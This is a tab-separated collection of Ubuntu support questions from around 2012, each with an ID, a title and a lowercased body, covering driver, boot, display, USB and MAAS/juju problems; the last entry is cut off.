221817	printing with lacie lightscribe requires root privileges	i have installed lacie lightscribe software on ubuntu 12.04 . everything seems to be fine , the drive is detected , the proper media is detected , but when i click print i get the message `` printing requires root privileges '' . i am the main ( administrator ) account on this computer , part of the sudo group and i can not seem to find an answer to this dilemna in plain english . i 've seen some apparently relevant posts which say things like `` check whether the files /usr/4l/4l-gui and /usr/4l/4l-cli have any setuid-bits set . if so , remove them '' but i need more detailed step-by-step instructions than that , please . is there anyone who knows how to solve this ?
221825	new 12.10 install on a dell 4550 blank desktop	i tried to install a new 12.10 installation along side a windows installation on a dell dimension 4550 . the install seems to be successful but after logging in the desktop is blank . i have tried some of the nvidia suggestions without success .
221826	function keys for asus n56vm not working	i have installed ubuntu 12.10 ( 64bits ) ( 3.5.0-18 kernel ) on an asus n56vm . most fn+key are working except for : brightness keys ( fn+f5/fn+f6 ) do n't work . fn+c - gamma keys fc+v - camera fn+space - toggle speed . i really like , at least , to have the brightness keys working . can you help ? best regards $ dmesg | grep -i asus [ 0.000000 ] dmi : asustek computer inc. n56vm/n56vm , bios n56vm.206 04/13/2012 [ 0.000000 ] acpi : rsdp 00000000cafcc000 00024 ( v02 _asus_ ) [ 0.000000 ] acpi : xsdt 00000000cafcc078 00074 ( v01 _asus_ notebook 01072009 ami 00010013 ) [ 0.000000 ] acpi : facp 00000000cafdf858 000f4 ( v04 _asus_ notebook 01072009 ami 00010013 ) [ 0.000000 ] acpi : dsdt 00000000cafcc188 136ca ( v02 _asus_ notebook 00000013 intl 20091112 ) [ 0.000000 ] acpi : apic 00000000cafdf950 00092 ( v03 _asus_ notebook 01072009 ami 00010013 ) [ 0.000000 ] acpi : fpdt 00000000cafdf9e8 00044 ( v01 _asus_ notebook 01072009 ami 00010013 ) [ 0.000000 ] acpi : ecdt 00000000cafdfa30 000c1 ( v01 _asus_ notebook 01072009 ami . 00000005 ) [ 0.000000 ] acpi : mcfg 00000000cafdfaf8 0003c ( v01 _asus_ notebook 01072009 msft 00000097 ) [ 0.000000 ] acpi : slic 00000000cafdfb38 00176 ( v01 _asus_ notebook 01072009 asus 00000001 ) [ 0.000000 ] acpi : hpet 00000000cafdfcb0 00038 ( v01 _asus_ notebook 01072009 ami . 00000005 ) [ 0.000000 ] acpi : bgrt 00000000cafe1090 00038 ( v00 _asus_ notebook 01072009 asus 00010013 ) [ 9.670500 ] asus_wmi : asus wmi generic driver loaded [ 9.671627 ] asus_wmi : initialization : 0x1asus_wmi : bios wmi version : 7.9 [ 9.671673 ] asus_wmi : sfun value : 0x6a0877 < 6 > [ 9.672086 ] input : asus wmi hotkeys as /devices/platform/asus-nb-wmi/input/input4 [ 9.732438 ] registered led device : asus : :kbd_backlight [ 9.733242 ] asus_wmi : backlight controlled by acpi video driver
221827	how do i get an evolve mars tv tuner working ?	i have only one question , can i use a dvb-t tunner there ? i have a dvb- t tunner evolve and i would like to use it in the ubuntu system . my questions are : is it possible ? is there any driver for it ? can you plese help me with that ? which program i have to use to use it ? because i have to have a dual boot system with windows only because of this in case of your help .
221829	recover ubuntu after mbr recreation	initially i had windows 7 . after installing ubuntu i was not able to boot into windows . therefore i recreated mbr from windows repair bootrect /fixmbr . i am not experience in those things therefore i wondered if it is possible to add ubuntu partition to the mbr so that i can dual-boot betweeen ubuntu and win7 .
221835	installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported )	i bought a computer with windows 8 pre-installed , but i did n't like windows 8 , so i decided to install ubuntu as a second operating system . i 'm absolutely new to linux . i have been using windows for all my life , but i have read about ubuntu ( and linux in general ) and i think i 'll like it , so i wanted to know how to install ubuntu on my pc with a pre-installed windows 8 on it . can i do it with wubi or through the live usb/dvd ? what steps do i need to take to correctly install ubuntu ?
221836	after update 12.04 - > 12.10 all works fine , but launcher is missing permanently	launcher is missing all the time . it is also missing in guest session . in the compiz config setting manager it is set to always show . what i tried : reinstalled nvidia drivers cleared all compiz and unity user settings nothing helped . when i open dash , there is not-blurred space in the left side of the screen in the launcher place . ( wanted to insert img , but ca n't )
221837	can i manually fix the wrong printable area settings of the printer ?	my printer ( deskjet 940c ) used to print just fine in ubuntu , but there has been some regression in some package so that now the system ( and this affects printing from any program ) does n't take into account the correct `` printable area '' and prints outside it , so i always get clipped printing . my guess is that probably the printable area size values for a given printer are stored somewhere and for some reason those of my printer have been replaced with wrong values ( unless it 's some bug that incorrectly uses them ) is there some file i can manually edit ( or some setting i can manually change ) to set the correct values of the printable area margin ?
221840	multiple tabs in firefox open automatically ?	whenever i start thunderbird ( 17.0 ) , something starts my 2 installed browsers /ff and chrome ) automatically and opens as many tabs as there are gif or jpeg or ico elements in the first email opened . sometimes having reached the tab limit ( ? ) , it opens a second or third instance of the browser and chokes my computer with 100 % cpu . i have seen as many as 83 open tabs in a > > single < < browser instance . clearing the browser history doesnt help at all . i changed to a mint dual boot installation but the `` infection '' followed me there to both browsers , probably transferred via xmarks . whenever i open an email with no graphics , only one tab is opened , seemingly always pointing to favicon.ico from google . clamtk antivirus show a clean machine . anyone with any suggestions ? ? environment ubuntu 12.10 / unity and mint 13 /maya
221843	terminal auto-closes with `` command not found '' error	i followed this guide in omg ubuntu . i 've just replaced the `` galaxynexus '' with `` asusinfinity '' . now terminal wo n't open printing this : and closing after that ... what did the last 3 commands do ( before android-connect ) ? what can i do to fix this ?
221847	windows too large on netbook	i am running ubuntu 12.04 desktop on an acer aspire one d255 netbook . certain windows are too tall for the screen . for example save windows will have the `` save '' button off the bottom of the screen . this problem does not happen with the 2d desktop . does anyone have a fix ? or is there a way to change the default size of such windows ?
221848	hp dv6z ( amd version 3243cl ) over heat & battery drain	i am new here on ubuntu ( 12.04 x64 ) ! the problem i am facing here is very less battery life and constant noise of fan during use of my laptop ! laptop has amd phoneme ii processor,6 gb ram , amd radeon mobility hd 4250 graphics.. i am not facing any issues regarding battery life or overheat on windows 7 ( 64 bit ) ! i appreciate reading my problem and hoping to get a noob friendly reply ! thanks !
221849	all video thumbnails fail to be generated	not a single video thumbnail is being generated and shown in nautilus . the folder ~/.cache/thumbnails/fail/gnome-thumbnail-factory/ keeps getting filled for all of them . i tried removing all the thumbnails from the folder , reinstalling the gstreamer-plugins- ... and totem packages , changing the thumbnail settings ( always , 4 gb ) in the preview section of the nautilus preferences . all to no avail . some recommend to install packages like libxine1 and ffmpegthumbnailer but this did n't not solve it either . there used to be an .xsession-errors error log file generated in the home folder in previous version of ubuntu but that does n't seem to be the case any more . i 'm running ubuntu 12.10 gnome remix ( x64 ) with the gnome3 ppa packages installed . what could be the cause of the problem and how can i fix it ?
221853	anyway to still have google play store on ubuntu ?	i was curious as to if i installed ubuntu on my nexus 7 if i could still take advantage of the google play store . i have many games i bought that i would not like to just leave behind if i installed ubuntu , examples being gta iii and minecraft .
221854	12.10 on acer apsire one d255	has anyone successfully run 12.10 on an acer aspire one d255 ( i have upgraded to 2gb ram ) ? 12.10 kept crashing after 2 to 5 minutes on mine , so i reloaded 12.04 which works great .
221855	ubuntu 12.10 not working on my laptop	i have asus k56 c with win7 64-bit intel and i like ubuntu so i have attempted to see if it will work on my laptop or not and i have downloaded wubi and it did n't work after installing it and told me their is an error . so i downloaded the 64-bit version and it is written on it amd so will it work on my laptop ? ? and if i succeed to install it will it be easy to uninstall it either along side with os or separate partitions ? ? thanks
221860	xubuntu mac theme ?	i have xubuntu 12.10 , and i would love to have a mac theme on it . i have been looking at this : http : //www.noobslab.com/2012/11/install-mac-os-x-theme-on-ubuntu-1210.html ... and i 'm wondering if it would work on xubuntu . if not , are there any suggestions or options ? thanks .
221862	ca n't compile a simple c program	i installed the last version of ubuntu . i tried to compile and run simple c program . i was get error : fatal error : stdio : no such file or directory i installed and updated gcc compiler few times , and i still get this error . can anybody help me please ? i put here the video record , there you can see my documents folder with libraries : http : //screencast.com/t/vi5b7cxnz
221863	how to boot to windows if grub is broken and bios wo n't open ?	i recently accidentally deleted my ubuntu partition . when i rebooted the computer , i got the dreaded grub rescue > prompt . i thought , `` simple fix , boot an ubuntu cd and add a new mbr '' . however , my bios will somehow not let me access any menus with any keys specified by my pc manufacturer ( msi ) . i think this is something to do with a fast boot mode or something , because i do n't see a msi logo on boot , so it may be skipping post . i need a way to boot an ubuntu livecd from grub or to boot the windows partition . nothing i have tried have worked . i tried listing the contents of all the drives provided by `` ls '' , but grub ca n't read any of them .
221866	i wan na partition more space for ubuntu ! ( dual booting w/ windows 7 )	so , i bought this computer recently , and immediately dual-booted ubuntu 12.04 lts with it . the other day , unfortunately , i ran out of the mere 20 or so gigs alloted to me ( out of about 700 ) . i 'd like to repartition more space , but i 'm running into a bit of trouble . i found this instruction : how do i remove windows but keep ubuntu ? but ran into problems when it came to booting from the flash . it 's just not recognizing the flash in my boot menu . i know that the flash works , i should add , because my girlfriend just used it twice for both of her machines . i 'm sure that it 's now obvious that i am sorely ignorant of this system admin stuff , so i 'm not even sure if this is the best way to go about it . can anyone help me out ? thanks !
221867	how do i get my wireless to work on a dell inspiron 6000 ?	when i installed ubuntu , everything was working perfectly except for the wireless networks . when i click on networks wireless is not an option . i know my wireless works because it worked fine before on fedora and windows . can anyone help me ?
221868	resolution resets after every reboot	i know this question has been asked before , and i know i 've fixed this before , but i ca n't find anything that works for some reason . background : every time i log in , my resolution resets to 1024x768 , so i have to open up the nvidia settings and change it back to 1280x1024 every time . question : is there a fix for this issue ? additional info : dell xps 400 xubuntu 12.10 ( fresh install , not upgraded from 12.04 ) graphics card : nvidia gt430 gpu driver : nvidia-current-updates
221874	rebooting from ubuntu server - minimal desktop installation	i installed server 12.10 with the `` -- without-recommends ubuntu-desktop '' option - this gives a minimal unity gui , without most of the addons for a desktop user . but now i can not figure out how to reboot . there is no system menu with these options ; calling reboot from terminal prompt requires access to root . still very new to ubuntu . how do i reboot from the gui ? control-atl-delete logs out , but does not reboot .
221876	how can i erase a folder or a file from the u1 cloud	i have being trying to erase a set of files and folders that i do not longer need but i do not find any option on my phone or on my ubuntu box . how can i do it ?
221878	how can install cuda geforce gt 555m drivers on ubuntu 12.04 virtualbox guest ?	i am running ubuntu 12.04 in a virtual box as guest os . today i have tried to enable all functions of my graphic card under ubuntu . but all my efforts were off the mark ... because my experience with linux is relatively small ... i have tried the procedure which is described as in http : //sn0v.wordpress.com/2012/05/11/installing-cuda-on-ubuntu-12-04/ . running the cuda-filepack always lead to an error like `` installing driver canceled '' . then i have tried to install the bumblebee project . but i always get the error that the bumblebee daemon is not started . after some internet research i found a test-command : lspci -nn | grep '\ [ 030 [ 02 ] \ ] ' which results in : 00:02.0 vga compatible controller [ 0300 ] : innotek ... [ 80ee : beef ] i 've been trying to activate the card you for hours without success . could you please give me some hints how to activate cuda ? kind regards
221882	is it safe to browse the web with firefox during ubuntu install ?	as asked in the title . i clicked on one of the links in the quantal installer ( set up via unetbootin ) and it launched firefox . will using it for a longer time during install cause conflict with language packs that i 'm installing ( example : polish ) ?
221885	unable to add another time zone in clock	i am unable to add another time zone in the clock . currently i am in india and also want to add sydney in the clock but when i try to add locations from the choose locations tab , it does n't show/recognize the city i enter . it comes up with a red circle ( like do not disturb icon in office communicator ) i tried to report a bug but it shows package clock does n't exist .
221887	gpg verification graphical user interface ?	is there a graphical user interface to verify gpg signatures ? i got a file and a file.sig . it 's clear how to do it in terminal but doing with a right click gui would be more comfortable . i read it 's possible with kgpg but i could n't get it to work . do you know a graphical user interface to verify gpg signatures or how kgpg can be utilized ?
221889	window 's files not appearing in ubuntu .	i 'm trying to delete old system files in windows 7 , i switched into ubuntu to delete the files there but now i ca n't see the files . they are on my d : drive and i can see all of the files on my c : drive , but not the d. i know that ubuntu does n't enumerate the drives but i have located the drives in ubuntu and am still having trouble accessing the files . i have tried using ctrl + h but the files still do not show up .
221892	networking disabled	both the wifi and the ethernet connection to the internet are not working . all had been functioning fine until the ubuntu suspended itself . on re-starting , the connection to internet failed to function and now i get the message `` network disabled '' whenever i re-boot . nm-tool tells me the state is `` asleep '' . stopping and starting the networkmanager has no effect the machine is an inspiron 9300 and work perfectly with windows . how do i wake the networking up ? thanks
221893	gwt ( google web toolkit ) designer not working on ubuntu 12.10	the gwt desinger is not working on ubuntu 12.10 . it worked on ubuntu 12.04 . i installed the eclipse plugin as described on the gwt homepate if i want to open the design-view ( for an xml-gwt-file ) , eclipse crashes ( prompt closing of the application ) . i found this two workarounds for which are for 12.04 ( but on 12.04 i did not need this to get it working - it worked out of the box for me ) . i tried them on my 12.10 ubuntu but they are not working . but i have to say that i ca n't find the `` use webkit for rendering gwt ui ( if available ) '' -flag . what can i do to get the gwt designer working ? i tested it successfully again on a 12.04 ubuntu vmware image . if i do n't get a solution , i have to downgrade my ubuntu to 12.04 again .
221894	display glitches running ati propietary driver under ubuntu 12.10	i have a lot of problems with the ati propietary driver ( fglrx ) . i have an imac ( mid 2011 ) with a radeon hd 6900m [ 1002:6720 ] . i did not have any problem under ubuntu 12.04 , but since i updated to 12.10 , i get some annoying graphic corruption . the worst one is that sometimes the screen does not update with the new information . it happens a lot when i change between tabs in chrome or sublime text . it usually gets updated when i scroll the page . sometimes , when i type , i have to wait a little bit to view the new characters . and i get trails when i move windows too ( like a part of the window ) . after a while , the trail disappears . i tried to install fglrx , fglrx-updates and the new beta driver downloaded from ati ( 12.11 beta 11/16/2012 ) , with no luck . it happens the same with all of them . i tried to mess with compiz config , but it did n't fix anything . the open source driver does not suffer this problem , but i need the performance of the propietary driver . do you have any clue ? thanks .
221899	how to download source code with apt-get ?	i 'm trying to download source code of certain packages , for example rhythmbox , for learning purposes . i want to do this through apt-get , with the apt-get source command . for some reason , apt-get ca n't seem to find any package . i 've tried several packages , and i keep getting this output from apt-get : $ apt-get source rhythmbox reading package lists ... done building dependency tree reading state information ... done e : unable to find a source package for rhythmbox i 've been searching for answers for quite some time now , but i ca n't find anyone with the same issue . apt-get works fine with installing and updating so apt-get works fine in my opinion . during the search i also learned that i had to enable the 'source code repositories ' in software sources , so that 's also enabled . i am aware of the fact that ( maybe only for certain packages , not sure ) source packages can also be downloaded with bzr from launchpad , but i want to know why this method wo n't work . thanks in advance !
221903	how do i change between ubuntuone accounts in a mac ?	i 've been using an account that i do n't want to keep using . i 'm trying to connect to a new one i 've just created . every time i try connect with the ubuntuone app it takes me back to the old account without asking for my email and password . what can i do ?
221905	triple-display setup using amd drivers	i am currently running a dual display setup with nvidia 8800gts video card , on a ubuntu 12.10 box . the current setup uses nvidia twinview to render the image on a 1920x1200 display and 1600x1200 one . i 'm planning to add a third , 1280x1024 display to the setup . the change will require me to upgrade my gfx card to one supporting triple displays . i 'll probably go with sapphire radeon 7770 ( flex edition , to avoid additional active dp- > dvi adapters ) . before i invest in new gfx i wanted to ask - how well the amd drivers will support such a setup . it does not matter whether it 's fglrx or the oss ones . if i remember correctly , when running fedora on a radeon x800 , i had 'void ' areas above and below the working area on my second display . the desktop was rendered in 1920+1280 width and 1200 height ( which left 176px of vertical space accessible for my cursor and windows but not displayed on the screen - i 'd prefer to avoid that ) . it may have very well been my misconfiguration back then . generally , are there any solutions from amd on par with twinview ? or is it a non-issue at all ? also , i 'm wondering about the usual stuff - hardware h264 decoding support , glitch-free flash support , any issues with compiz/unity ?
221909	login problems with ubuntu 11.10	i installed 11.10 server on to my server everything went well then i tried to log in my username worked fine but when i tried to type my password nothing showed up ? what can i do to fix this ? should i just install 12.4.0
221912	12.04 custom kernel migrate to 12.10 ?	just like it says in the title , if i customize the kernel for the computer , does it stay that way if i were to update to 12.10 ? thanks !
221915	on gui reset , desktop appears `` off '' of display	on ubunutu 12.04 lts , whenever i reset the gui ( ctl + alt + f7 or when i try to come back from suspend ) my desktop appears `` off '' of my screen . upon gui reset , almost my entire laptop screen is black , with the exception of a vertical bar with a very small width on the left side of my display . this vertical bar appears to be the rightmost portion of my desktop , because i can move my mouse there and select the rightmost menu option from my upper menu bar . it is as if someone took my desktop and shifted it slightly less than one screen 's width to the left . has anyone experienced something similar or know something i could try ? i recently attached my computer to an external monitor which i am no longer using , and i have never had this issue prior to that event .
221921	i burnt ubuntu to a cd , and when i went to install it , it asked me to remove the cd and press enter . then it booted into windows	as you can see by the very long title , that 's exactly what happened . after i proceeded to install ubuntu ( 12.04 lts ) to my computer , making it run alongside windows 7 , i got a black screen asking me to remove the cd , close the disk tray , and press enter . now i m back in windows . any help ?
221923	can not perform installation due to `` this application has failed to start because the application configuration is incorrect . '' error	i am trying to do a fresh install of 12.04 on a system running windows xp . i only want to run ubuntu as my os . after downloading and unzipping the file when i try to run wubi i receive the error : this application has failed to start because the application configuration is incorrect . reinstalling the application may fix the problem '' i have tried too reinstall numerous times and still i receive the same error . can some one help me please help me ?
221926	dual booting windows 8 and ubuntu 12.10 - thinkpad x230	i am having problems getting grub to load windows 8 properly after installing ubuntu 12.10 and windows 8 on a solid state drive . here 's what i did : fresh install of windows 8 using usb recovery drive ( partitioned ssd for uefi ) -- tested windows install and it worked fine built bootable usb with ubuntu 12.10 64bit and installed ubuntu -- used ubuntu 's installer to partition the windows 8 partition and install there reboot - try to load windows 8 from grub -- ubuntu loads correctly ; windows load reports various problems with permissions and not being able to find files - i 'll update what the actual errors are tried to fix the boot problem using boot-repair : -- here 's the output : http : //paste.ubuntu.com/1384522/ so , this is my first time trying to setup a dual boot system and i think that uefi is the main culprit in getting this to work correctly . what do i need to
221929	gnome shell does n't load on xubuntu	all these things i have done before on an identical previous installation on the same laptop , and it worked perfectly . so this is very confusing for me : i installed xubuntu 12.10 on my laptop and have now decided to install gnome shell ( using sudo apt-get install gnome-shell ) for when i want to show how pretty linux can be to my mac and windows-using friends : d unfortunately , whilst gnome now appears as a session on the login screen , loading it simply results in a blank desktop with no panel . is there a gnome error log somewhere which i can access , or is there a common cause for this sort of problem ? thanks edit - i tried switching to gdm as my display manager ( using sudo dpkg-reconfigure gdm ) , and gnome-shell worked . but it broke again when i switched back to lightdm . this was n't the case with my last installation - can anyone suggest what 's gone wrong ?
221932	synaptics touchpad v7.4 can not move while pressing a key ?	my synaptics touchpad v7.4 wo n't move when i 'm using my arrow keys . everywhere i 've looked on the internet is telling me to go to device pointer properties > settings > pointing > sensitivity > palm check and adjust those palm check settings , but that option is n't there and it is n't anywhere else . i 've also read about going to something called `` smart sense '' but i did n't see that either . if someone could please help me , i would really appreciate it .
221935	need kppp software for internet access but cant download it via windows ?	i have a sprint u600 3g internet card , and i need to get kppp & kppplogview ( based on a tutorial on sprints website ) but it 's not letting me download it unless i already have linux installed . how can i acquire it ?
221936	bumblebee / getting nvidia 310.19 drivers to work | 12.10	asus u31jg - a1 laptop : -intel core i3 -nvidia 415m / intel hd graphics ( optimus technology ) hello , i have been trying for about 3 weeks now to get any kind of nvidia driver to work , and now am determined to get the 310.19 driver to work . i have tried numerous times of which either nothing happened or my interface ( menu bars , the top and left bar on desktop , and the ability to close a window ) would disappear . apparently i 'm not making the connection on how to get these to install properly . i have tried numerous other posts and websites and attempted `` bumblebee '' to no avail . i am wondering if anyone can write a step by step guide of commands that i need to run in terminal to get this to work . i 've had to reinstall 12.10 , so if you could walk me through the process of getting the drivers downloaded and installed , i would greatly appreciate it . i barely know what i 'm doing , and this is quite a turn off for someone new to ubuntu , i really want to enjoy it but this is preventing me from committing . thank you in advance , and i apologize for being so flustered / helpless with this but i have ran out of patience with this .
221943	how can i turn off my server when i am in the login screen ?	i would like to turn off my server by pressing the power button . the problem is if i am in the login screen ( i have n't logged in yet ) . pressing the power button will not shutdown my server . how can i solve this problem ?
221945	blank desktop after installing 12.10	all appeared to go correctly after installing 12.10 using the windows installer on my windows xp computer . chose to boot with ubuntu and logged in without any error messages . the desktop remains blank with only the background pattern visible . i did see some icons across the top while logging in but they disappeared once i logged in . any help will be greatly appreciated . lee
221946	installed spotify linux preview , but how do i run it ?	i went through the command-line steps and ( i belie ) successfully installed spotify linux preview . but now how do i run it ? i 'm up for command-line or gnome-based solutions . thanks .
221947	usb stick detected but ca n't be mounted	i have a kingston datatraveler se6 8gb usb stick which i use as a liveusb medium . the liveusb was created with unetbootin and was working fine , i also enabled persistance in it . today i connected the usb into another computer but it was not being mounted anywhere . i opened a terminal window and issued lsusb and it gets detected : bus 001 device 016 : id 0951:1664 kingston technology and opening the discs application shows this : it says it 's located in /dev/sdd however that location is non existant , this is what i get from blkid : /dev/sda : label= '' backup 2 '' uuid= '' 6c5d28267db27322 '' type= '' ntfs '' /dev/sdb1 : label= '' reservado para el sistema '' uuid= '' 4c4c42384c421cd8 '' type= '' ntfs '' /dev/sdb2 : uuid= '' d8e444d2e444b512 '' type= '' ntfs '' /dev/sdc1 : label= '' backup '' uuid= '' 6ecb255d7ec7ead4 '' type= '' ntfs '' /dev/sdc2 : uuid= '' c7a99999-898f-4452-afc2-05525c6b20f2 '' type= '' ext4 '' /dev/sdc3 : uuid= '' a5ec-08d2 '' type= '' vfat '' /dev/sdc4 : uuid= '' 00b3c665-7957-4884-8244-e7f94b2a12b5 '' type= '' swap '' /dev/sdc5 : uuid= '' efe13c6c-c69d-4b91-9a7d-a33c21ec3fb0 '' uuid_sub= '' 478d3690-c14c-4dec-ac7c-06a7daad021d '' type= '' btrfs '' /dev/sdc6 : uuid= '' 79e19479-3d06-4e0f-a8a5-352a0dc71deb '' uuid_sub= '' 5dc9e118-a6e2-4e1f-bb08-d103608d6afc '' type= '' btrfs '' since the usb stick is getting detected i 'm hoping there 's still something i can do to format it and keep using it , how can i forcefully mount it and format it to fat ? if i attempt to mount it it gives me this : sudo mkdir /media/usbdrive sudo mount -t vfat /dev/sdd /media/usbdrive mount : special device /dev/sdd does not exist if i try to use the command dd this happens : sudo dd if=/dev/zero of=/dev/sdd bs=512 count=1 dd : opening `/dev/sdd ' : no medium found if i try to use mkfs.vfat this happens : sudo mkfs.vfat /dev/sdd mkfs.vfat 3.0.13 ( 30 jun 2012 ) /dev/sdd : no medium found it is worth mentioning that , in both ubuntu and windows the usb is detected but ca n't be mounted . windows makes a sound notifying that a device has been inserted and ubuntu does as described above . under windows the device is assigned a drive letter in my case e : however it does n't show up in the explorer sidebar but does show up under the device manager .
221957	only can move the pointer after upgrading	i made a partition on my desktop pc , 100 gb and installed ubuntu 12.10 on it . it was pretty slow first thought it had to install updates or something , so i rebooted it . now after the login it looks like everything freezes , i can move my mouse only , but that 's it ! i can see my desktop and launcher , but the task bar does n't display time and misc system info , only a black bar , i downloaded the android sdk pack and installed vlc media player before i rebooted . my computer info : 1 tb hdd 8 gb ddr3 ram ati radeon 4890 videocard ( 1 gb ) amd phenom 2 x4 black 3 , 2ghz cpu ( 64 bits )
221960	resolution resets after every reboot , screen resoultion stuck at 1024x768	i installed a fresh copy of ubuntu 12.10 but the problem is that it does not recognize my monitor which is lg e1942 . the screen resolution is stuck at 1024x768 and the other option is 800x600 but my monitor has the option resolution of 1366x768 . my system configuration is : intel i7-2600k intel z68db motherboard 8gb ram intel hd2000 graphics ( no graphics card ... . ) i have tried using cvt and xrandr but it changes to default 1024x768 after every reboot . also i am not able to find the xorg.conf file .
221961	wubi wants amd64.tar.xz , i have intel processor	i have an intel cpu but wubi wants to download wubi-amd64.tar.xz . is the correct download ?
221962	how can i extract a page range / a part of a pdf ?	do you have any idea how to extract a part of a pdf document and save it as pdf ? on os x it is absolutely trivial by using preview . i tried pdf editor and other programs but to no avail . i would like a program where i select the part that i want and then save it as pdf with a simple command like cmd+n on os x. i want the extracted part to be saved in pdf format and not jpeg etc .
221969	nvidia driver issue macbook pro via virtualbox	i installed ubuntu 12.04.1 on my macbook pro via virtualbox and for some reason i can not get my nvidia geforce 9400m driver to install . what are the necessary steps to install this driver ? i have tried to install the drivers via software center but have had no luck . i even tried a few sudo commands but after trying i realized they were for windows host based systems . could someone please instruct me on how to install this driver ? thank you all in advance ! iz
221970	installing an older version of kazam	i do not like the new version of kazam & was wandering if there is any way to install the previous version in ubuntu 12.04 ( i know the previous version runs in 12.04 as i recently upgraded it ) . anyone know if this is possible and how to do it ?
221971	why is my system slow to boot ?	for some reason , my system takes over a minute to boot -- this , despite ubuntu 's efforts for a faster boot . it 's a fairly new laptop -- 2 or 3 years old -- and while 10 seconds might be ambitious , over a minute seems a bit long . i 've created a bootchart . i 'm blind , so i ca n't read this myself , and the logs do n't appear fit for human consumption . http : //thewordnerd.info/bootchart.png any help diagnosing this would be greatly appreciated . this is on a dell e4300 . thanks .
221979	logging problem with juju bootstrap	i have trouble with using juju and maas with ubuntu . i i ran command 'juju bootstrap ' , the following error was shown in /var/log/maas/maas.log : ==================================================================================== error 2012-11-26 09:05:09,041 maas.maasserver # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # exception : file not found # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 159 error 2012-11-26 09:05:09,041 maas.maasserver traceback ( most recent call last ) : 160 file `` /usr/lib/python2.7/dist-packages/django/core/handlers/base.py '' , line 111 , in get_response 161 response = callback ( request , *callback_args , **callback_kwargs ) 162 file `` /usr/lib/python2.7/dist-packages/django/views/decorators/vary.py '' , line 19 , in inner_func 163 response = func ( *args , **kwargs ) 164 file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 167 , in call 165 result = self.error_handler ( e , request , meth , em_format ) 166 file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 165 , in call 167 result = meth ( request , *args , **kwargs ) 168 file `` /usr/lib/python2.7/dist-packages/maasserver/api.py '' , line 296 , in dispatch 169 return function ( self , request , *args , **kwargs ) 170 file `` /usr/lib/python2.7/dist-packages/maasserver/api.py '' , line 945 , in get_file 171 maasapinotfound : file not found 172 173 error 2012-11-26 09:05:09,343 maas.maasserver # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # exception : you are not allowed to start up this node . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 174 error 2012-11-26 09:05:09,343 maas.maasserver traceback ( most recent call last ) : 175 file `` /usr/lib/python2.7/dist-packages/django/core/handlers/base.py '' , line 111 , in get_response 176 response = callback ( request , *callback_args , **callback_kwargs ) 177 file `` /usr/lib/python2.7/dist-packages/django/views/decorators/vary.py '' , line 19 , in inner_func 178 response = func ( *args , **kwargs ) 179 file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 167 , in call 180 result = self.error_handler ( e , request , meth , em_format ) 181 file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 165 , in call 182 result = meth ( request , *args , **kwargs ) 183 file `` /usr/lib/python2.7/dist-packages/maasserver/api.py '' , line 296 , in dispatch 184 return function ( self , request , *args , **kwargs ) 185 file `` /usr/lib/python2.7/dist-packages/maasserver/api.py '' , line 585 , in start 186 `` you are not allowed to start up this node . '' ) 187 permissiondenied : you are not allowed to start up this node . ==================================================================================== it seems that there is problem with getting a file in api.py . so , i tried to add some logs like the following , but maasserver can not recognize 'logging ' module . import logging ... logger = logging.getlogger ( 'maas.maasserver ' ) logger.info ( filename ) could you let me know how to add logs in juju and maasserver python scripts ? how to debug maasserver and juju python script more easily ? thanks in advance ,
221981	how to run minecraft ?	i am totally new to linux and am trying to run minecraft on it . i have tried to search the web but unfortunately dont quite understand . can some one please break it down a little simpler . thanks
221985	ubuntu 12.10 shutdown/restart from login-screen	when i click shutdown or restart from login-screen , nothing happens .
221986	dishonored only displays a black screen	i 've recently bought and downloaded dishonored . sadly , however , when i try to run it , all i get is a black screen . no video , no audio , nothing . i 'm running it from steam in wine 1.14 on ubuntu 12.04 ( 64 bit ) . i know other people have it working perfectly with practically the same configuration . i 'm guessing there 's something simple i can do to get it working , and i 've tried some things , but i do n't really know what to do to make it work . i 'd really appreciate any tips to get this game running .
221990	help with steam	when i run steam my computer it keep saying that i do n't have the latest nvidia drivers . i use additional drives and it said that i have the latest one . i un-install and re-install the divers but it still say the same thing . please help . sorry i 'm new to linux and ubuntu .
221991	unity launcher shortcut to a terminal command	i 've downloaded from the usc an app that grabs colors with the mouse ( result shows in the terminal ) and i 'm trying to add a unity launcher app to run that command in the gnome-terminal . here is the code : # ! /usr/bin/bash [ desktop entry ] type=application name=grab color exec=gnome-terminal -x grabc categories=development ; icon=/home/diogo/.local/share/applications/colorline.png the problem is that when i click the icon the terminal opens and closes . i just want it to be open in order to see the grabbed color . can someone help me ? : (
221996	ubuntu 12.10 bcm 4313 wireless n issue	i have a hp dv6-7014nr and i just installed ubuntu on it and after some trouble i have my wireless working for the most part . the one last problem i have is that wireless n still is not working , i can only access g networks . my wireless card is the bcm4313 broadcom wireless adapter.i am using the bcmwl-kernel-source driver .
221997	how would you recommend upgrading from ubuntu server 9.04 to 12.10 ?	is upgrading from ubuntu server 9.04 to 12.10 advisable or a potential train wreck ?
221999	gnome-shell fails to load on 12.10	i 'm usually the one answering questions , but in this i 'm throughly stumped ! my setup : ubuntu 12.10 ( dist upgrade form 12.04 ) ati m96 [ mobility radeon hd 4650 ] upon the first installation of 12.10 i had all kinds of issues getting the legacy ati drivers to install ( i guess the source for the drivers is n't kosher with kernel 3.5 ) . so , i added the repository ppa : makson96/fglrx - which has a version of the ati source patched to work with kernel 3.5 . after installation of fglrx-legacy from that ppa , gnome-shell and all my graphics work fine ... until today . the problem i unsuspended my computer today and the screen was black ( not off , the black from the gnome lock screen ) . i 'd move my mouse/hit a key and the background would flash and then it 'd go back to black . restarted via vt1 logged into gnome ( gnome-shell ) session , but no gnome-shell ! investigation : first , i went to vt1 and tried export display=:0 ; gnome-shell -- replace . it appeared to work fine , switch back to x and nothing . went back to vt1 and saw this error message : js error : ! ! ! exception was : typeerror : object 0x7fc748129c30 is not a subclass of ( null ) , it 's a xō js error : ! ! ! message = ' '' object 0x7fc748129c30 is not a subclass of ( null ) , it 's a xō '' ' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/ui/tweener.js '' ' js error : ! ! ! linenumber = '218' js error : ! ! ! stack = ' '' ( ) @ 